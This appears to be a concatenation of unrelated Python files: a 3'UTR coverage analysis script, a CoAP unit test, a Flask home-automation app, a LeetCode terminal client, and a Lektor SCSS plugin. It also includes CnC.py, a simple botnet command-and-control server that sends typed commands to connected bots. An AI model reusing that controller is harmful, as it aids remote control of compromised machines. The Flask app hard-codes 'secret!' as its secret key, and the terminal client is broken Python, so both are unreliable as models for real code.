exit(1)
cfg_file = sys.argv[1]
curr_processing_chr = sys.argv[2]
print("[%s] Start Analysis ..." % time_now(), file=sys.stderr)
Group1_Tophat_aligned_file, output_directory, Annotated_3UTR_file, Output_result_file, sequencing_depth_file, Num_threads, Coverage_threshold = parse_cfgfile(cfg_file)
All_Sample_files = Group1_Tophat_aligned_file[:]
Sample_name = []
for sample in All_Sample_files:
sample_name = sample.rsplit('.',1)[0]
Sample_name.append(sample_name)
##Prepare output directory
output_directory = output_directory.strip('/') + '_' + curr_processing_chr + '/'
d = os.path.dirname(output_directory)
if not os.path.exists(d):
os.makedirs(d)
temp_dir = d + '/tmp/'
if not os.path.exists(temp_dir):
os.makedirs(temp_dir)
Output_all_prediction_file = output_directory + Output_result_file + '_result_temp.' + curr_processing_chr + '.txt'
Output_result = open(Output_all_prediction_file, 'w')
num_samples = len(All_Sample_files)
print("All samples Joint Processing %s ..." % curr_processing_chr, file=sys.stderr)
print("[%s] Loading Coverage ..." % time_now(), file=sys.stderr)
All_samples_Target_3UTR_coverages, UTR_events_dict = Load_Target_Wig_files_Multiple_threads_shared_dict_sampleid_key(All_Sample_files, Annotated_3UTR_file, Num_threads,curr_processing_chr)
All_samples_sequencing_depths = load_sequencing_depth(sequencing_depth_file)
print(All_samples_sequencing_depths)
All_sample_coverage_weights = All_samples_sequencing_depths/np.mean(All_samples_sequencing_depths)
#print All_sample_coverage_weights
print("[%s] Loading Coverage Finished ..." % time_now(), file=sys.stderr)
#Write the first line
first_line = ['Gene','fit_value','Predicted_Proximal_APA','Loci']
for i in range(num_samples):
#curr_long_exp = 'Sample_%s_long_exp' % str(i+1)
#curr_short_exp = 'Sample_%s_short_exp' % str(i+1)
curr_ratio = '%s_PDUI' % str(Sample_name[i])
#first_line.extend([curr_long_exp,curr_short_exp,curr_ratio])
first_line.append(curr_ratio)
Output_result.writelines('\t'.join(first_line) + '\n')
All_events_ids = list(UTR_events_dict.keys())
num_threads = Num_threads
Assigned_events_ids_all_threads = Assign_to_different_processor_balance_events(All_events_ids, num_threads)
num_real_threads = len(Assigned_events_ids_all_threads)
Output_each_processor_all = []
for i in range(num_real_threads):
curr_temp_output = temp_dir + 'Each_processor_3UTR_Result_%s.txt' % (str(i+1))
Output_each_processor_all.append(curr_temp_output)
processes = []
for i in range(num_real_threads):
process = multiprocessing.Process(target=Each_Thread_3UTR_estimation_list_version_sample_ids, args=(Assigned_events_ids_all_threads[i], UTR_events_dict, All_sample_coverage_weights, num_samples, Output_each_processor_all[i], All_samples_Target_3UTR_coverages, Coverage_threshold))
process.start()
processes.append(process)
for p in processes:
p.join()
#Combine results
for i in range(num_real_threads):
curr_result = Output_each_processor_all[i]
for line in open(curr_result, 'r'):
Output_result.writelines(line)
Output_result.close()
#print >> sys.stderr, "[%s] Filtering the Results ..." % time_now()
#Output_all_filtered_prediction_file = output_directory + Output_result_file + '_results_final.' + curr_processing_chr + '.txt'
#Dapars_Filtering(Output_all_prediction_file, num_samples, Output_all_filtered_prediction_file)
print("[%s] Finished!" % time_now(), file=sys.stderr)
def Each_Thread_3UTR_estimation_list_version_sample_ids(curr_thread_UTR_events_ids, UTR_events_dict, All_sample_coverage_weights, num_samples, Output_result_file, All_samples_coverage_shared_dict, Coverage_threshold):
Output_result = open(Output_result_file,'w')
for curr_3UTR_id in curr_thread_UTR_events_ids:
curr_3UTR_structure = UTR_events_dict[curr_3UTR_id]
region_start = curr_3UTR_structure[1]
region_end = curr_3UTR_structure[2]
curr_strand = curr_3UTR_structure[-2]
UTR_pos = curr_3UTR_structure[-1]
curr_3UTR_all_samples_bp_coverage = []
for i in range(num_samples):
curr_sample_curr_3UTR_coverage_wig = All_samples_coverage_shared_dict[curr_3UTR_id, i]
curr_3UTR_curr_sample_bp_coverage = Convert_wig_into_bp_coverage(curr_sample_curr_3UTR_coverage_wig[0], curr_sample_curr_3UTR_coverage_wig[1], curr_strand)
curr_3UTR_all_samples_bp_coverage.append(curr_3UTR_curr_sample_bp_coverage)
select_mean_squared_error, selected_break_point, UTR_abundances = De_Novo_3UTR_Coverage_estimation_Genome_for_multiple_samples(curr_3UTR_all_samples_bp_coverage, region_start, region_end,curr_strand,All_sample_coverage_weights, Coverage_threshold)
if str(select_mean_squared_error) != "Na":
num_non_zero = 1
if num_non_zero > 0:
All_long_inclusion_ratios = []
line_write = [curr_3UTR_id, "%.1f" % select_mean_squared_error, str(selected_break_point), UTR_pos]
for i in range(num_samples):
if UTR_abundances[0][i] != 'NA':
# long 3'UTR percentage
curr_sample_ratio = float(UTR_abundances[0][i])/(float(UTR_abundances[0][i]) + float(UTR_abundances[1][i]))
All_long_inclusion_ratios.append(curr_sample_ratio)
#line_write.append("%.2f" % UTR_abundances[0][i])#long 3' UTR abundance
#line_write.append("%.2f" % UTR_abundances[1][i])#short 3' UTR abundance
line_write.append("%.2f" % curr_sample_ratio)
else:
line_write.extend(['NA']*1)
Output_result.writelines( '\t'.join(line_write) + '\n')
Output_result.close()
def De_Novo_3UTR_Coverage_estimation_Genome_for_multiple_samples(All_Samples_curr_3UTR_coverages, UTR_start, UTR_end, curr_strand, weight_for_second_coverage, Coverage_threshold):
coverage_threshold = Coverage_threshold
search_point_start = 150 ##200
search_point_end = int(abs((UTR_end - UTR_start))*0.05)
num_samples = len(All_Samples_curr_3UTR_coverages)
#Read Coverage
Region_Coverages = []
Pass_threshold_index = []
for i in range(num_samples):
curr_Region_Coverage_raw = All_Samples_curr_3UTR_coverages[i]
curr_Region_Coverage = curr_Region_Coverage_raw/weight_for_second_coverage[i]#@xdzou: not modified yet
curr_first_100_coverage = np.mean(curr_Region_Coverage_raw[0:99])
if curr_first_100_coverage > coverage_threshold:
Pass_threshold_index.append(i)
Region_Coverages.append(curr_Region_Coverage)
least_pass_coverage_num = num_samples * least_pass_coverage_percentage
if len(Pass_threshold_index) > least_pass_coverage_num and UTR_end - UTR_start >=150:
if curr_strand == "+":
search_region = list(range(UTR_start+search_point_start, UTR_end-search_point_end+1))
else:
search_region = list(range(UTR_end - search_point_start, UTR_start+search_point_end-1, -1))
search_region_start = search_point_start
search_region_end = UTR_end - UTR_start - search_point_end
Mean_squared_error_list = []
Estimated_3UTR_abundance_list = []
for curr_point in range(search_region_start, search_region_end+1):
curr_search_point = curr_point
All_samples_result = [[],[],[]]
for curr_sample_region_coverage in Region_Coverages:
Mean_Squared_error, Long_UTR_abun, Short_UTR_abun = Estimation_abundance(curr_sample_region_coverage, curr_search_point)
All_samples_result[0].append(Mean_Squared_error)
All_samples_result[1].append(Long_UTR_abun)
All_samples_result[2].append(Short_UTR_abun)
Mean_Squared_error = np.mean(np.array(All_samples_result[0]))
Mean_squared_error_list.append(Mean_Squared_error)
Estimated_3UTR_abundance_list.append([All_samples_result[1],All_samples_result[2]])
if len(Mean_squared_error_list) > 1:
min_ele_index = Mean_squared_error_list.index(min(Mean_squared_error_list))
select_mean_squared_error = Mean_squared_error_list[min_ele_index]
selected_break_point = search_region[min_ele_index]
UTR_abundances = [['NA']*num_samples, ['NA']*num_samples]
UTR_abundances_passed = Estimated_3UTR_abundance_list[min_ele_index]
for k in range(len(Pass_threshold_index)):
UTR_abundances[0][Pass_threshold_index[k]] = UTR_abundances_passed[0][k]
UTR_abundances[1][Pass_threshold_index[k]] = UTR_abundances_passed[1][k]
else:
selected_break_point = 'Na'
UTR_abundances = 'Na'
select_mean_squared_error = 'Na'
else:
selected_break_point = 'Na'
UTR_abundances = 'Na'
select_mean_squared_error = 'Na'
return select_mean_squared_error, selected_break_point, UTR_abundances
def Estimation_abundance(Region_Coverage, break_point):
Long_UTR_abun = np.mean(Region_Coverage[break_point:])
Short_UTR_abun = np.mean(Region_Coverage[0:break_point] - Long_UTR_abun)
if Short_UTR_abun < 0:
Short_UTR_abun = 0
Coverage_diff = Region_Coverage[0:break_point] - Long_UTR_abun - Short_UTR_abun
Coverage_diff= np.append(Coverage_diff, Region_Coverage[break_point:] - Long_UTR_abun)
Mean_Squared_error = np.mean(Coverage_diff**2)
return Mean_Squared_error, Long_UTR_abun, Short_UTR_abun
def Load_Target_Wig_files_Multiple_threads_shared_dict_sampleid_key(All_Wig_files,UTR_Annotation_file, num_threads,curr_processing_chr):
num_samples = len(All_Wig_files)
UTR_events_dict = {}
for line in open(UTR_Annotation_file, 'r'):
fields = line.strip('\n').split('\t')
curr_chr = fields[0]
if curr_chr == curr_processing_chr:
region_start = fields[1]
region_end = fields[2]
curr_strand = fields[-1]
UTR_pos = "%s:%s-%s" %(curr_chr, region_start, region_end)
end_shift = int(round(abs(int(region_start) - int(region_end)) * 0.2))
if curr_strand == "+":
region_end = str(int(region_end) - end_shift)
else:
region_start = str(int(region_start) + end_shift)
region_start = int(region_start) + 1
region_end = int(region_end) - 1
if region_start + 50 < region_end:
UTR_events_dict[fields[3]] = [fields[0],region_start,region_end,fields[-1],UTR_pos]
Assigned_index = Assign_to_different_processor_balance(num_samples, num_threads)
manager = multiprocessing.Manager() # create only 1 Manager
All_samples_extracted_3UTR_coverage_dict = manager.dict() # create only 1 dict
processes = []
Final_assigned_threads_num = len(Assigned_index)
for i in range(Final_assigned_threads_num):
process = multiprocessing.Process(target=load_wig_funct_shared_dict_sampleid_key, args=(All_Wig_files, Assigned_index[i], UTR_events_dict,curr_processing_chr,All_samples_extracted_3UTR_coverage_dict))
process.start()
processes.append(process)
for p in processes:
p.join()
return All_samples_extracted_3UTR_coverage_dict, UTR_events_dict
def load_wig_funct_shared_dict_sampleid_key(All_wig_files, assigned_indexes,UTR_events_dict, curr_processing_chr, All_samples_extracted_3UTR_coverage_dict):
'''
All_samples_extracted_3UTR_coverage_dict: sample id is the key.
'''
for i in assigned_indexes:
curr_wig_file = All_wig_files[i]
print(curr_wig_file, file=sys.stderr)
curr_sample_All_chroms_coverage_dict = {}
with open(curr_wig_file, 'r') as fin:
for line in fin:
if line[0] != '#' and line[0] != 't':
fields = line.strip('\n').split('\t')
chrom_name = fields[0]
if chrom_name == curr_processing_chr:
region_start = int(fields[1])
region_end = int(fields[2])
if chrom_name not in curr_sample_All_chroms_coverage_dict:
curr_sample_All_chroms_coverage_dict[chrom_name] = [[0],[0]]
if region_start > curr_sample_All_chroms_coverage_dict[chrom_name][0][-1]:
curr_sample_All_chroms_coverage_dict[chrom_name][0].append(region_start)
curr_sample_All_chroms_coverage_dict[chrom_name][1].append(0)
curr_sample_All_chroms_coverage_dict[chrom_name][0].append(region_end)
curr_sample_All_chroms_coverage_dict[chrom_name][1].append(int(float(fields[-1])))
else:
if len(curr_sample_All_chroms_coverage_dict)>0:
break
fin.close()
if curr_processing_chr not in curr_sample_All_chroms_coverage_dict:
print('no wig: ' + curr_wig_file, file=sys.stderr)
else:
curr_sample_All_chroms_coverage_dict[curr_processing_chr][1].append(0)
curr_sample_coverage_dict = {}
for curr_3UTR_event_id in UTR_events_dict:
curr_3UTR_structure = UTR_events_dict[curr_3UTR_event_id]
curr_chr_local = curr_3UTR_structure[0]
if curr_chr_local in curr_sample_All_chroms_coverage_dict:
curr_chr_coverage = curr_sample_All_chroms_coverage_dict[curr_chr_local]
region_start = curr_3UTR_structure[1]
region_end = curr_3UTR_structure[2]
left_region_index = bisect(curr_chr_coverage[0],region_start)
right_region_index = bisect(curr_chr_coverage[0],region_end)
extracted_coverage = curr_chr_coverage[1][left_region_index:right_region_index+1]
extracted_3UTR_region = curr_chr_coverage[0][left_region_index:right_region_index]
extracted_3UTR_region.insert(0,region_start)
extracted_3UTR_region.append(region_end)
curr_event_info = [extracted_coverage,extracted_3UTR_region]
All_samples_extracted_3UTR_coverage_dict[curr_3UTR_event_id,i] = curr_event_info
def Assign_to_different_processor_balance(Total_number, num_processors):
Assigned_results = []
num_each_processor = int(Total_number/num_processors)#@xdzou: add int() to convert the value into a integer othwise float
if num_each_processor == 0:
for i in range(Total_number):
Assigned_results.append([i])
else:
remain = Total_number - num_processors * num_each_processor
for i in range(remain):
Assigned_results.append(list(range((i)*(num_each_processor + 1), (i+1)*(num_each_processor + 1))))
for i in range(num_processors-remain):
Assigned_results.append(list(range(i*num_each_processor+remain*(num_each_processor+1), (i+1)*num_each_processor+remain*(num_each_processor+1))))
return Assigned_results
def Assign_to_different_processor_balance_events(All_events_ids, num_processors):
Assigned_results = []
Total_number = len(All_events_ids)
num_each_processor = int(Total_number/num_processors) #@xdzou, add int()
if num_each_processor == 0:
for i in range(Total_number):
Assigned_results.append([i])
else:
remain = Total_number - num_processors * num_each_processor
for i in range(remain):
Assigned_results.append(list(range((i)*(num_each_processor+1), (i+1)*(num_each_processor+1))))
for i in range(num_processors-remain):
Assigned_results.append(list(range(i*num_each_processor+remain*(num_each_processor+1), (i+1)*num_each_processor+remain*(num_each_processor+1))))
#print assigned Results
Assigned_events = []
print('#assigned events:')
for curr_processor_inds in Assigned_results:
curr_processor_events = []
print(len(curr_processor_inds))
for curr_ele in curr_processor_inds:
curr_processor_events.append(All_events_ids[curr_ele])
Assigned_events.append(curr_processor_events)
return Assigned_events
#global parameters
least_pass_coverage_percentage = 0.3
De_Novo_3UTR_Identification_Loading_Target_Wig_for_TCGA_Multiple_Samples_Multiple_threads_Main3_shared_list(sys.argv)
|
coverage_test_multicast.py
|
from queue import Queue
import random
import threading
import unittest
from coapclient import HelperClient
from coapserver import CoAPServer
from coapthon import defines
from coapthon.messages.message import Message
from coapthon.messages.option import Option
from coapthon.messages.request import Request
from coapthon.messages.response import Response
__author__ = 'Giacomo Tanganelli'
__version__ = "2.0"
class Tests(unittest.TestCase):
def setUp(self):
self.server_address = (defines.ALL_COAP_NODES, 5683)
self.current_mid = random.randint(1, 1000)
self.server_mid = random.randint(1000, 2000)
self.server = CoAPServer("0.0.0.0", 5683, multicast=True)
self.server_thread = threading.Thread(target=self.server.listen, args=(10,))
self.server_thread.start()
self.queue = Queue()
def tearDown(self):
self.server.close()
self.server_thread.join(timeout=25)
self.server = None
def _test_with_client(self, message_list): # pragma: no cover
client = HelperClient(self.server_address)
for message, expected in message_list:
if message is not None:
received_message = client.send_request(message)
if expected is not None:
if expected.type is not None:
self.assertEqual(received_message.type, expected.type)
if expected.mid is not None:
self.assertEqual(received_message.mid, expected.mid)
self.assertEqual(received_message.code, expected.code)
if expected.source is not None:
self.assertEqual(received_message.source, self.server_address)
if expected.token is not None:
self.assertEqual(received_message.token, expected.token)
if expected.payload is not None:
self.assertEqual(received_message.payload, expected.payload)
if expected.options:
self.assertEqual(len(received_message.options), len(expected.options))
for o in expected.options:
assert isinstance(o, Option)
option_value = getattr(expected, o.name.lower().replace("-", "_"))
option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
self.assertEqual(option_value, option_value_rec)
client.stop()
def _test_with_client_observe(self, message_list): # pragma: no cover
client = HelperClient(self.server_address)
for message, expected in message_list:
if message is not None:
client.send_request(message, self.client_callback)
if expected is not None:
received_message = self.queue.get()
if expected.type is not None:
self.assertEqual(received_message.type, expected.type)
if expected.mid is not None:
self.assertEqual(received_message.mid, expected.mid)
self.assertEqual(received_message.code, expected.code)
if expected.source is not None:
self.assertEqual(received_message.source, self.server_address)
if expected.token is not None:
self.assertEqual(received_message.token, expected.token)
if expected.payload is not None:
self.assertEqual(received_message.payload, expected.payload)
if expected.options:
self.assertEqual(len(received_message.options), len(expected.options))
for o in expected.options:
assert isinstance(o, Option)
option_value = getattr(expected, o.name.lower().replace("-", "_"))
option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
self.assertEqual(option_value, option_value_rec)
client.stop()
def client_callback(self, response):
print("Callback")
self.queue.put(response)
def test_not_allowed(self):
print("TEST_NOT_ALLOWED")
path = "/void"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange1 = (req, expected)
self.current_mid += 1
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange2 = (req, expected)
self.current_mid += 1
req = Request()
req.code = defines.Codes.PUT.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange3 = (req, expected)
self.current_mid += 1
req = Request()
req.code = defines.Codes.DELETE.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.METHOD_NOT_ALLOWED.number
expected.token = None
exchange4 = (req, expected)
self.current_mid += 1
self._test_with_client([exchange1, exchange2, exchange3, exchange4])
if __name__ == '__main__':
unittest.main()
|
main.py
|
from gpio import setup_gpio
from gpio import close_gpio
from climate import Climate
from state import HouseState
from control import mqtthread
from control import sensor_pollings
from control import register_device
from control import handle_button
from control import toggle_client_output
from control import toggle_alarm
from logger import Logger
from mqtt import MqttClient
from flask import Flask, render_template
from flask_socketio import SocketIO, emit
import threading
import signal
import sys
import csv
def cleanup(signal, frame):
close_gpio()
sys.exit(0)
signal.signal(signal.SIGINT, cleanup)
app = Flask(__name__)
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
import logging
logging.getLogger('werkzeug').setLevel(logging.ERROR)
@app.route('/')
def index():
state = HouseState.get_instance()
state_data = {
"alarm": "Ativado" if state.alarm else "Desativado",
"alarmButton": "Desativar" if state.alarm else "Ativar"
}
devices = []
try:
with open("data/devices.csv") as devices_csv:
reader = csv.reader(devices_csv)
for row in reader:
devices.append({"room": row[0], "in": row[1], "out": row[2]})
except FileNotFoundError:
with open("data/devices.csv", "w") as devices_csv:
pass
return render_template('index.html', devices=devices, state=state_data)
@socketio.on('button')
def handle_button_event(data):
handle_button(data)
@socketio.on('register')
def register_device_event(data):
register_device(data, socketio)
@socketio.on('remoteOut')
def toggle_client_output_event(data):
toggle_client_output(data, socketio)
@socketio.on('toggleAlarm')
def toggle_alarm_event(data):
toggle_alarm(data, socketio)
def main():
logger = Logger.get_instance()
state = HouseState.get_instance()
setup_gpio()
t1 = threading.Thread(target=mqtthread, args=(socketio,), daemon=True)
t1.start()
t2 = threading.Thread(target=sensor_pollings, args=(socketio,), daemon=True)
t2.start()
if __name__ == "__main__":
main()
socketio.run(app, port=10103)
|
CnC.py
|
import socket
from threading import Thread
import time
threads = []
clients = []
def listen_for_bots(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", port))
sock.listen()
bot, bot_address = sock.accept()
clients.append(bot)
def main():
print("[+] Server bot waiting for incoming connections")
startig_port = 8085
bots = 3
for i in range(bots):
t = Thread(target=listen_for_bots, args=(i + startig_port,), daemon=True)
threads.append(t)
t.start()
# bot, bot_address = s.accept()
run_cnc = True
while run_cnc:
if len(clients) != 0:
for i, c in enumerate(clients):
print("\t\t", i, "\t", c.getpeername())
selected_client = int(input("[+] Select client by index: "))
bot = clients[selected_client]
run_bot = True
while run_bot:
msg = input("[+] Enter Msg: ")
msg = msg.encode()
bot.send(msg)
if msg.decode() == "exit":
run_bot = False
status = bot.recv(1024)
if status == "disconnected".encode():
bot.close()
clients.remove(bot)
print("data sent")
else:
print("[+] No clients connected")
ans = input("[+] Do you want to exit? press [y/n] ")
if ans == "y":
run_cnc = False
else:
run_cnc = True
if __name__ == "__main__":
main()
|
terminal.py
|
import sys
import time
import logging
from threading import Thread
import urwid
from .leetcode import Leetcode, Quiz
from views.home import HomeView
from views.detail import DetailView
from views.help import HelpView
from views.loading import *
from views.viewhelper import *
from views.result import ResultView
from .config import config
import auth
from .code import *
palette = [
('body', 'dark cyan', ''),
('focus', 'white', ''),
('head', 'white', 'dark gray'),
('lock', 'dark gray', ''),
('tag', 'white', 'light cyan', 'standout'),
('hometag', 'dark red', ''),
('accepted', 'dark green', '')
]
class Terminal(object):
def __init__(self):
self.home_view = None
self.loop = None
self.leetcode = Leetcode()
self.help_view = None
self.quit_confirm_view = None
self.submit_confirm_view = None
self.view_stack = []
self.detail_view = None
self.search_view = None
self.loading_view = None
self.logger = logging.getLogger(__name__)
@property
def current_view(self):
return None if not len(self.view_stack) else self.view_stack[-1]
@property
def is_home(self):
return len(self.view_stack) == 1
def goto_view(self, view):
self.loop.widget = view
self.view_stack.append(view)
def go_back(self):
self.view_stack.pop()
self.loop.widget = self.current_view
def keystroke(self, key):
if self.quit_confirm_view and self.current_view == self.quit_confirm_view:
if key is 'y':
raise urwid.ExitMainLoop()
else:
self.go_back()
elif self.submit_confirm_view and self.current_view == self.submit_confirm_view:
self.go_back()
if key is 'y':
self.send_code(self.detail_view.quiz)
elif self.current_view == self.search_view:
if key is 'enter':
text = self.search_view.contents[1][0].original_widget.get_edit_text()
self.home_view.handle_search(text)
self.go_back()
elif key is 'esc':
self.go_back()
elif key in ('q', 'Q'):
self.goto_view(self.make_quit_confirmation())
elif key is 's':
if not self.is_home:
self.goto_view(self.make_submit_confirmation())
elif not self.is_home and (key is 'left' or key is 'h'):
self.go_back()
elif key is 'H':
if not self.help_view:
self.make_helpview()
self.goto_view(self.help_view)
elif key is 'R':
if self.is_home:
self.reload_list()
elif key is 'f':
if self.is_home:
self.enter_search()
elif key in ('enter', 'right'):
if self.is_home and self.home_view.is_current_item_enterable():
self.enter_detail(self.home_view.get_current_item_data())
else:
return key
def enter_search(self):
self.make_search_view()
self.goto_view(self.search_view)
def enter_detail(self, data):
self.show_loading('Loading Quiz', 17, self.current_view)
self.t = Thread(target=self.run_retrieve_detail, args=(data,))
self.t.start()
def reload_list(self):
'''Press R in home view to retrieve quiz list'''
self.leetcode.load()
if self.leetcode.quizzes and len(self.leetcode.quizzes) > 0:
self.home_view = self.make_listview(self.leetcode.quizzes)
self.view_stack = []
self.goto_view(self.home_view)
def make_quit_confirmation(self):
text = urwid.AttrMap(urwid.Text('Do you really want to quit ? (y/n)'), 'body')
self.quit_confirm_view = urwid.Overlay(text, self.current_view, 'left',
('relative', 100), 'bottom', None)
return self.quit_confirm_view
def make_submit_confirmation(self):
text = urwid.AttrMap(urwid.Text('Do you want to submit your code ? (y/n)'), 'body')
self.submit_confirm_view = urwid.Overlay(text, self.current_view, 'left',
('relative', 100), 'bottom', None)
return self.submit_confirm_view
def make_search_view(self):
text = urwid.AttrMap(urwid.Edit('Search by id: ', ''), 'body')
self.search_view = urwid.Overlay(text, self.current_view, 'left',
('relative', 100), 'bottom', None)
return self.search_view
def make_detailview(self, data):
self.detail_view = DetailView(data, self.loop)
return self.detail_view
def make_listview(self, data):
header = self.make_header()
self.home_view = HomeView(data, header)
return self.home_view
def make_header(self):
if self.leetcode.is_login:
columns = [
('fixed', 15, urwid.Padding(urwid.AttrWrap(
urwid.Text('%s' % config.username),
'head', ''))),
urwid.AttrWrap(urwid.Text('You have solved %d / %d problems. ' %
(len(self.leetcode.solved), len(self.leetcode.quizzes))), 'head', ''),
]
return urwid.Columns(columns)
else:
text = urwid.AttrWrap(urwid.Text('Not login'), 'head')
return text
def make_helpview(self):
self.help_view = HelpView()
return self.help_view
def show_loading(self, text, width, host_view=urwid.SolidFill()):
self.loading_view = LoadingView(text, width, host_view, self.loop)
self.loop.widget = self.loading_view
self.loading_view.start()
def end_loading(self):
if self.loading_view:
self.loading_view.end()
self.loading_view = None
def retrieve_home_done(self, quizzes):
self.home_view = self.make_listview(quizzes)
self.view_stack = []
self.goto_view(self.home_view)
self.end_loading()
delay_refresh(self.loop)
def retrieve_detail_done(self, data):
data.id = self.home_view.listbox.get_focus()[0].data.id
data.url = self.home_view.listbox.get_focus()[0].data.url
self.goto_view(self.make_detailview(data))
self.end_loading()
delay_refresh(self.loop)
def run_retrieve_home(self):
self.leetcode.is_login = auth.is_login()
if not self.leetcode.is_login:
self.leetcode.is_login = auth.login()
if self.loading_view:
self.loading_view.set_text('Loading')
self.leetcode.load()
if self.leetcode.quizzes and len(self.leetcode.quizzes) > 0:
self.retrieve_home_done(self.leetcode.quizzes)
else:
self.end_loading()
toast = Toast('Request fail!', 10, self.current_view, self.loop)
toast.show()
self.logger.error('get quiz list fail')
def run_retrieve_detail(self, quiz):
ret = quiz.load()
if ret:
self.retrieve_detail_done(quiz)
else:
self.end_loading()
toast = Toast('Request fail!', 10, self.current_view, self.loop)
toast.show()
self.logger.error('get detail %s fail', quiz.id)
def run_send_code(self, quiz):
filepath = get_code_file_path(quiz.id)
if not os.path.exists(filepath):
return
code = get_code_for_submission(filepath)
code = code.replace('\n', '\r\n')
success, text_or_id = quiz.submit(code)
if success:
self.loading_view.set_text('Retrieving')
code = 1
while code > 0:
r = quiz.check_submission_result(text_or_id)
code = r[0]
self.end_loading()
if code < -1:
toast = Toast('error: %s' % r[1], 10 + len(r[1]), self.current_view, self.loop)
toast.show()
else:
try:
result = ResultView(quiz, self.detail_view, r[1], loop=self.loop)
result.show()
except ValueError as e:
toast = Toast('error: %s' % e, 10 + len(str(e)), self.current_view, self.loop)
toast.show()
delay_refresh(self.loop)
else:
self.end_loading()
toast = Toast('error: %s' % text_or_id, 10 + len(text_or_id), self.current_view, self.loop)
toast.show()
self.logger.error('send data fail')
def send_code(self, data):
self.show_loading('Sending code', 17, self.current_view)
self.t = Thread(target=self.run_send_code, args=(data,))
self.t.start()
def run(self):
self.loop = urwid.MainLoop(None, palette, unhandled_input=self.keystroke)
self.show_loading('Log In', 12)
self.t = Thread(target=self.run_retrieve_home)
self.t.start()
try:
self.loop.run()
except KeyboardInterrupt:
self.logger.info('Keyboard interrupt')
except Exception,e:
self.logger.exception("Fatal error in main loop")
finally:
self.clear_thread()
sys.exit()
def clear_thread(self):
if self.loading_view:
self.loading_view.end()
if self.t and self.t.is_alive():
t.join()
|
lektor_scss.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sass
import errno
import re
from lektor.pluginsystem import Plugin
from termcolor import colored
import threading
import time
COMPILE_FLAG = "scss"
class scssPlugin(Plugin):
name = u'Lektor scss'
description = u'Lektor plugin to compile css out of sass - based on libsass'
def __init__(self, *args, **kwargs):
Plugin.__init__(self, *args, **kwargs)
config = self.get_config()
self.source_dir = config.get('source_dir', 'assets/scss/')
self.output_dir = config.get('output_dir', 'assets/css/')
self.output_style = config.get('output_style', 'compressed')
self.source_comments = config.get('source_comments', 'False')
self.precision = config.get('precision', '5')
self.name_prefix = config.get('name_prefix', '')
self.include_paths = []
raw_include_paths = config.get('include_paths', '')
# convert a path expression with ',' as seperator symbol
include_path_list = list(filter(lambda el: len(el) > 0, raw_include_paths.split(',')))
for path in include_path_list:
if path.startswith('/'):
self.include_paths.append(path)
else:
self.include_paths.append(os.path.realpath(os.path.join(self.env.root_path, path)))
self.watcher = None
self.run_watcher = False
def is_enabled(self, build_flags):
return bool(build_flags.get(COMPILE_FLAG))
def find_dependencies(self, target):
dependencies = [target]
with open(target, 'r') as f:
data = f.read()
imports = re.findall(r'@import\s+((?:[\'|\"]\S+[\'|\"]\s*(?:,\s*(?:\/\/\s*|)|;))+)', data)
for files in imports:
files = re.sub('[\'\"\n\r;]', '', files)
# find correct filename and add to watchlist (recursive so dependencies of dependencies get added aswell)
for file in files.split(","):
file = file.strip()
# when filename ends with css libsass converts it to a url()
if file.endswith('.css'):
continue
basepath = os.path.dirname(target)
filepath = os.path.dirname(file)
basename = os.path.basename(file)
filenames = [
basename,
'_' + basename,
basename + '.scss',
basename + '.css',
'_' + basename + '.scss',
'_' + basename + '.css'
]
for filename in filenames:
path = os.path.join(basepath, filepath, filename)
if os.path.isfile(path):
dependencies += self.find_dependencies(path)
return dependencies
def compile_file(self, target, output, dependencies):
"""
Compiles the target scss file.
"""
filename = os.path.splitext(os.path.basename(target))[0]
if not filename.endswith(self.name_prefix):
filename += self.name_prefix
filename += '.css'
output_file = os.path.join(output, filename)
# check if dependency changed and rebuild if it did
rebuild = False
for dependency in dependencies:
if ( not os.path.isfile(output_file) or os.path.getmtime(dependency) > os.path.getmtime(output_file)):
rebuild = True
break
if not rebuild:
return
result = sass.compile(
filename=target,
output_style=self.output_style,
precision=int(self.precision),
source_comments=(self.source_comments.lower()=='true'),
include_paths=self.include_paths
)
with open(output_file, 'w') as fw:
fw.write(result)
print(colored('css', 'green'), self.source_dir + os.path.basename(target), '\u27a1', self.output_dir + filename)
def find_files(self, destination):
"""
Finds all scss files in the given destination. (ignore files starting with _)
"""
for root, dirs, files in os.walk(destination):
for f in files:
if (f.endswith('.scss') or f.endswith('.sass')) and not f.startswith('_'):
yield os.path.join(root, f)
def thread(self, output, watch_files):
while True:
if not self.run_watcher:
self.watcher = None
break
for filename, dependencies in watch_files:
self.compile_file(filename, output, dependencies)
time.sleep(1)
def on_server_spawn(self, **extra):
self.run_watcher = True
def on_server_stop(self, **extra):
if self.watcher is not None:
self.run_watcher = False
print('stopped')
def make_sure_path_exists(self, path):
try:
os.makedirs(path)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise
def on_before_build_all(self, builder, **extra):
try: # lektor 3+
is_enabled = self.is_enabled(builder.extra_flags)
except AttributeError: # lektor 2+
is_enabled = self.is_enabled(builder.build_flags)
# only run when server runs
if not is_enabled or self.watcher:
return
root_scss = os.path.join(self.env.root_path, self.source_dir )
output = os.path.join(self.env.root_path, self.output_dir )
config_file = os.path.join(self.env.root_path, 'configs/scss.ini')
# output path has to exist
#os.makedirs(output, exist_ok=True) when python2 finally runs out
self.make_sure_path_exists(output)
